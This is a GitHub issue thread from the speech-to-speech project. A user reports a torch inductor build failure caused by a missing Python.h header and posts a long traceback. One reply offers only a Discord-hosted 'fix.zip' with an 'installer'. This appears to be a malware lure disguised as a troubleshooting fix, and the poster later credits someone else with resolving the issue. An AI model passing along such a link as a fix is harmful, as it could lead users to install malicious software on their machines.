### ISSUE TITLE
How to run in ubuntu

### ISSUE THREAD

**Issue by Basal365** [huggingface/speech-to-speech#71]
I am trying to run it locally in my Ubuntu machine I have nvidia gpu and already setup CUDA.

```
python s2s_pipeline.py \
	--recv_host 0.0.0.0 \
	--send_host 0.0.0.0 \
	--lm_model_name microsoft/Phi-3-mini-4k-instruct \
	--init_chat_role system \
	--stt_compile_mode reduce-overhead \
	--tts_compile_mode default 
```
This is the command I passed in the terminal but I am getting Error like this

```
(venv) basal-desktop@basal-desktop:/media/basal-desktop/E/speech-to-speech$ python s2s_pipeline.py      --recv_host 0.0.0.0     --send_host 0.0.0.0     --lm_model_name microsoft/Phi-3-mini-4k-instruct     --init_chat_role system         --stt_compile_mode reduce-overhead      --tts_compile_mode default 
[nltk_data] Downloading package averaged_perceptron_tagger_eng to
[nltk_data]     /home/basal-desktop/nltk_data...
[nltk_data]   Package averaged_perceptron_tagger_eng is already up-to-
[nltk_data]       date!
Using cache found in /home/basal-desktop/.cache/torch/hub/snakers4_silero-vad_master
2024-09-03 11:20:08,495 - STT.whisper_stt_handler - INFO - Warming up WhisperSTTHandler
You have passed task=transcribe, but also have set `forced_decoder_ids` to [[1, None], [2, 50360]] which creates a conflict. `forced_decoder_ids` will be ignored in favor of task=transcribe.
The attention mask is not set and cannot be inferred from input because pad token is same as eos token.As a consequence, you may observe unexpected behavior. Please pass your input's `attention_mask` to obtain reliable results.
/tmp/tmp1sx5flzq/main.c:5:10: fatal error: Python.h: No such file or directory
    5 | #include <Python.h>
      |          ^~~~~~~~~~
compilation terminated.
/tmp/tmp7dgszafh/main.c:5:10: fatal error: Python.h: No such file or directory
    5 | #include <Python.h>
      |          ^~~~~~~~~~
compilation terminated.
/tmp/tmpgutcpzdq/main.c:5:10: fatal error: Python.h: No such file or directory
    5 | #include <Python.h>
      |          ^~~~~~~~~~
compilation terminated.
/tmp/tmpxya7vifd/main.c:5:10: fatal error: Python.h: No such file or directory
    5 | #include <Python.h>
      |          ^~~~~~~~~~
compilation terminated.
/tmp/tmpoxfa0b57/main.c:5:10: fatal error: Python.h: No such file or directory
    5 | #include <Python.h>
      |          ^~~~~~~~~~
compilation terminated.
/tmp/tmp9sd15wgk/main.c:5:10: fatal error: Python.h: No such file or directory
    5 | #include <Python.h>
      |          ^~~~~~~~~~
compilation terminated.
/tmp/tmpuimau_4j/main.c:5:10: fatal error: Python.h: No such file or directory
    5 | #include <Python.h>
      |          ^~~~~~~~~~
compilation terminated.
/tmp/tmp2hzix58m/main.c:5:10: fatal error: Python.h: No such file or directory
    5 | #include <Python.h>
      |          ^~~~~~~~~~
compilation terminated.
/tmp/tmppnjhbdhp/main.c:5:10: fatal error: Python.h: No such file or directory
    5 | #include <Python.h>
      |          ^~~~~~~~~~
compilation terminated.
/tmp/tmp2dvfaztp/main.c:5:10: fatal error: Python.h: No such file or directory
    5 | #include <Python.h>
      |          ^~~~~~~~~~
compilation terminated.
/tmp/tmpaofqmu2k/main.c:5:10: fatal error: Python.h: No such file or directory
    5 | #include <Python.h>
      |          ^~~~~~~~~~
compilation terminated.
/tmp/tmpcnc1scdn/main.c:5:10: fatal error: Python.h: No such file or directory
    5 | #include <Python.h>
      |          ^~~~~~~~~~
compilation terminated.
/tmp/tmpnsf4b2jl/main.c:5:10: fatal error: Python.h: No such file or directory
    5 | #include <Python.h>
      |          ^~~~~~~~~~
compilation terminated.
/tmp/tmpf_5rg_m_/main.c:5:10: fatal error: Python.h: No such file or directory
    5 | #include <Python.h>
      |          ^~~~~~~~~~
compilation terminated.
/tmp/tmpnf8nvq6n/main.c:5:10: fatal error: Python.h: No such file or directory
    5 | #include <Python.h>
      |          ^~~~~~~~~~
compilation terminated.
/tmp/tmp2f8iezjt/main.c:5:10: fatal error: Python.h: No such file or directory
    5 | #include <Python.h>
      |          ^~~~~~~~~~
compilation terminated.
/tmp/tmp_om2_15p/main.c:5:10: fatal error: Python.h: No such file or directory
    5 | #include <Python.h>
      |          ^~~~~~~~~~
compilation terminated.
/tmp/tmpc0t1q8vd/main.c:5:10: fatal error: Python.h: No such file or directory
    5 | #include <Python.h>
      |          ^~~~~~~~~~
compilation terminated.
/tmp/tmpdsdc_2ef/main.c:5:10: fatal error: Python.h: No such file or directory
    5 | #include <Python.h>
      |          ^~~~~~~~~~
compilation terminated.
/tmp/tmp7h6fpvoc/main.c:5:10: fatal error: Python.h: No such file or directory
    5 | #include <Python.h>
      |          ^~~~~~~~~~
compilation terminated.
/tmp/tmp4qfy9i7j/main.c:5:10: fatal error: Python.h: No such file or directory
    5 | #include <Python.h>
      |          ^~~~~~~~~~
compilation terminated.
/tmp/tmpsjvhjzmz/main.c:5:10: fatal error: Python.h: No such file or directory
    5 | #include <Python.h>
      |          ^~~~~~~~~~
compilation terminated.
/tmp/tmph1myffwn/main.c:5:10: fatal error: Python.h: No such file or directory
    5 | #include <Python.h>
      |          ^~~~~~~~~~
compilation terminated.
Traceback (most recent call last):
  File "/media/basal-desktop/E/speech-to-speech/s2s_pipeline.py", line 344, in <module>
    main()
  File "/media/basal-desktop/E/speech-to-speech/s2s_pipeline.py", line 244, in main
    stt = WhisperSTTHandler(
  File "/media/basal-desktop/E/speech-to-speech/baseHandler.py", line 20, in __init__
    self.setup(*setup_args, **setup_kwargs)
  File "/media/basal-desktop/E/speech-to-speech/STT/whisper_stt_handler.py", line 46, in setup
    self.warmup()
  File "/media/basal-desktop/E/speech-to-speech/STT/whisper_stt_handler.py", line 87, in warmup
    _ = self.model.generate(dummy_input, **warmup_gen_kwargs)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/transformers/models/whisper/generation_whisper.py", line 658, in generate
    ) = self.generate_with_fallback(
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/transformers/models/whisper/generation_whisper.py", line 801, in generate_with_fallback
    seek_outputs = super().generate(
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/utils/_contextlib.py", line 116, in decorate_context
    return func(*args, **kwargs)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/transformers/generation/utils.py", line 1989, in generate
    result = self._sample(
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/transformers/generation/utils.py", line 2932, in _sample
    outputs = self(**model_inputs, return_dict=True)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/nn/modules/module.py", line 1553, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/nn/modules/module.py", line 1562, in _call_impl
    return forward_call(*args, **kwargs)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_dynamo/eval_frame.py", line 433, in _fn
    return fn(*args, **kwargs)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_dynamo/convert_frame.py", line 1116, in __call__
    return self._torchdynamo_orig_callable(
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_dynamo/convert_frame.py", line 472, in __call__
    return _compile(
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_utils_internal.py", line 84, in wrapper_function
    return StrobelightCompileTimeProfiler.profile_compile_time(
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_strobelight/compile_time_profiler.py", line 129, in profile_compile_time
    return func(*args, **kwargs)
  File "/usr/lib/python3.10/contextlib.py", line 79, in inner
    return func(*args, **kwds)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_dynamo/convert_frame.py", line 817, in _compile
    guarded_code = compile_inner(code, one_graph, hooks, transform)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_dynamo/utils.py", line 231, in time_wrapper
    r = func(*args, **kwargs)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_dynamo/convert_frame.py", line 636, in compile_inner
    out_code = transform_code_object(code, transform)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_dynamo/bytecode_transformation.py", line 1185, in transform_code_object
    transformations(instructions, code_options)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_dynamo/convert_frame.py", line 178, in _fn
    return fn(*args, **kwargs)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_dynamo/convert_frame.py", line 582, in transform
    tracer.run()
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_dynamo/symbolic_convert.py", line 2451, in run
    super().run()
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_dynamo/symbolic_convert.py", line 893, in run
    while self.step():
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_dynamo/symbolic_convert.py", line 805, in step
    self.dispatch_table[inst.opcode](self, inst)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_dynamo/symbolic_convert.py", line 2642, in RETURN_VALUE
    self._return(inst)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_dynamo/symbolic_convert.py", line 2627, in _return
    self.output.compile_subgraph(
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_dynamo/output_graph.py", line 1123, in compile_subgraph
    self.compile_and_call_fx_graph(tx, pass2.graph_output_vars(), root)
  File "/usr/lib/python3.10/contextlib.py", line 79, in inner
    return func(*args, **kwds)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_dynamo/output_graph.py", line 1318, in compile_and_call_fx_graph
    compiled_fn = self.call_user_compiler(gm)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_dynamo/utils.py", line 231, in time_wrapper
    r = func(*args, **kwargs)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_dynamo/output_graph.py", line 1409, in call_user_compiler
    raise BackendCompilerFailed(self.compiler_fn, e).with_traceback(
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_dynamo/output_graph.py", line 1390, in call_user_compiler
    compiled_fn = compiler_fn(gm, self.example_inputs())
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_dynamo/repro/after_dynamo.py", line 129, in __call__
    compiled_gm = compiler_fn(gm, example_inputs)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_dynamo/repro/after_dynamo.py", line 129, in __call__
    compiled_gm = compiler_fn(gm, example_inputs)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/__init__.py", line 1951, in __call__
    return compile_fx(model_, inputs_, config_patches=self.config)
  File "/usr/lib/python3.10/contextlib.py", line 79, in inner
    return func(*args, **kwds)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_inductor/compile_fx.py", line 1261, in compile_fx
    return compile_fx(
  File "/usr/lib/python3.10/contextlib.py", line 79, in inner
    return func(*args, **kwds)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_inductor/compile_fx.py", line 1505, in compile_fx
    return aot_autograd(
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_dynamo/backends/common.py", line 69, in __call__
    cg = aot_module_simplified(gm, example_inputs, **self.kwargs)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_functorch/aot_autograd.py", line 954, in aot_module_simplified
    compiled_fn, _ = create_aot_dispatcher_function(
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_dynamo/utils.py", line 231, in time_wrapper
    r = func(*args, **kwargs)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_functorch/aot_autograd.py", line 687, in create_aot_dispatcher_function
    compiled_fn, fw_metadata = compiler_fn(
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_functorch/_aot_autograd/jit_compile_runtime_wrappers.py", line 168, in aot_dispatch_base
    compiled_fw = compiler(fw_module, updated_flat_args)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_dynamo/utils.py", line 231, in time_wrapper
    r = func(*args, **kwargs)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_inductor/compile_fx.py", line 1410, in fw_compiler_base
    return inner_compile(
  File "/usr/lib/python3.10/contextlib.py", line 79, in inner
    return func(*args, **kwds)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_dynamo/repro/after_aot.py", line 84, in debug_wrapper
    inner_compiled_fn = compiler_fn(gm, example_inputs)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_inductor/debug.py", line 304, in inner
    return fn(*args, **kwargs)
  File "/usr/lib/python3.10/contextlib.py", line 79, in inner
    return func(*args, **kwds)
  File "/usr/lib/python3.10/contextlib.py", line 79, in inner
    return func(*args, **kwds)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_dynamo/utils.py", line 231, in time_wrapper
    r = func(*args, **kwargs)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_inductor/compile_fx.py", line 527, in compile_fx_inner
    compiled_graph = fx_codegen_and_compile(
  File "/usr/lib/python3.10/contextlib.py", line 79, in inner
    return func(*args, **kwds)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_inductor/compile_fx.py", line 831, in fx_codegen_and_compile
    compiled_fn = graph.compile_to_fn()
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_inductor/graph.py", line 1749, in compile_to_fn
    return self.compile_to_module().call
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_dynamo/utils.py", line 231, in time_wrapper
    r = func(*args, **kwargs)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_inductor/graph.py", line 1678, in compile_to_module
    self.codegen_with_cpp_wrapper() if self.cpp_wrapper else self.codegen()
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_inductor/graph.py", line 1638, in codegen
    self.scheduler.codegen()
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_dynamo/utils.py", line 231, in time_wrapper
    r = func(*args, **kwargs)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_inductor/scheduler.py", line 2741, in codegen
    self.get_backend(device).codegen_node(node)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_inductor/codegen/cuda_combined_scheduling.py", line 69, in codegen_node
    return self._triton_scheduling.codegen_node(node)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_inductor/codegen/simd.py", line 1148, in codegen_node
    return self.codegen_node_schedule(node_schedule, buf_accesses, numel, rnumel)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_inductor/codegen/simd.py", line 1317, in codegen_node_schedule
    src_code = kernel.codegen_kernel()
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_inductor/codegen/triton.py", line 2159, in codegen_kernel
    **self.inductor_meta_common(),
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/_inductor/codegen/triton.py", line 2047, in inductor_meta_common
    "backend_hash": torch.utils._triton.triton_hash_with_backend(),
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/utils/_triton.py", line 63, in triton_hash_with_backend
    backend = triton_backend()
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/torch/utils/_triton.py", line 49, in triton_backend
    target = driver.active.get_current_target()
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/triton/runtime/driver.py", line 23, in __getattr__
    self._initialize_obj()
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/triton/runtime/driver.py", line 20, in _initialize_obj
    self._obj = self._init_fn()
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/triton/runtime/driver.py", line 9, in _create_driver
    return actives[0]()
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/triton/backends/nvidia/driver.py", line 371, in __init__
    self.utils = CudaUtils()  # TODO: make static
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/triton/backends/nvidia/driver.py", line 80, in __init__
    mod = compile_module_from_src(Path(os.path.join(dirname, "driver.c")).read_text(), "cuda_utils")
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/triton/backends/nvidia/driver.py", line 57, in compile_module_from_src
    so = _build(name, src_path, tmpdir, library_dirs(), include_dir, libraries)
  File "/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/triton/runtime/build.py", line 48, in _build
    ret = subprocess.check_call(cc_cmd)
  File "/usr/lib/python3.10/subprocess.py", line 369, in check_call
    raise CalledProcessError(retcode, cmd)
torch._dynamo.exc.BackendCompilerFailed: backend='inductor' raised:
CalledProcessError: Command '['/usr/bin/gcc', '/tmp/tmph1myffwn/main.c', '-O3', '-shared', '-fPIC', '-o', '/tmp/tmph1myffwn/cuda_utils.cpython-310-x86_64-linux-gnu.so', '-lcuda', '-L/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/triton/backends/nvidia/lib', '-L/lib/x86_64-linux-gnu', '-I/media/basal-desktop/E/speech-to-speech/venv/lib/python3.10/site-packages/triton/backends/nvidia/include', '-I/tmp/tmph1myffwn', '-I/usr/include/python3.10']' returned non-zero exit status 1.

Set TORCH_LOGS="+dynamo" and TORCHDYNAMO_VERBOSE=1 for more information


You can suppress this exception and fall back to eager by setting:
    import torch._dynamo
    torch._dynamo.config.suppress_errors = True
```

Can someone tell weather this is the right command or is there any mistake in what I am doing.

**Comment by maher-nakesh** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by Basal365** [comment]
Thank You @andimarafioti , Now the issue is resolved.
